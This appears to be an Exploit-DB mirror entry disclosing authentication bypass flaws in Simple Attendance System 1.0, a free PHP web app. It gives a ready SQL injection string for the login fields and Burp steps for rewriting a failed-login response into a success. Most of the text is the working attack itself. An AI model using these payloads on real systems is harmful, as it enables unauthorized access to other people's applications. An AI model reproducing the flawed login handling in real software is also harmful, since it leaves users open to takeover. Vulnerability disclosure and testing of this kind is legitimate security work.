exploit-db-mirror/exploits/php/webapps/50301.txt
Offensive Security 769a5959a9 DB: 2021-09-18
3 changes to exploits/shellcodes

WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
Simple Attendance System 1.0 - Authenticated bypass
2021-09-18 05:02:03 +00:00

33 lines
No EOL
1.1 KiB
Text

# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Simple Attendance System, is prone to multiple vulnerabilities.
Easy authentication bypass vulnerability on the application
allowing the attacker to login
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/attendance/login.php
Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+
----- PoC-2: Authentication Bypass -----
Steps:
1. Enter wrong crendentials http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
{"status":"failed","msg":"Invalid username or password."}
with
{"status":"success","msg":"Login successfully."}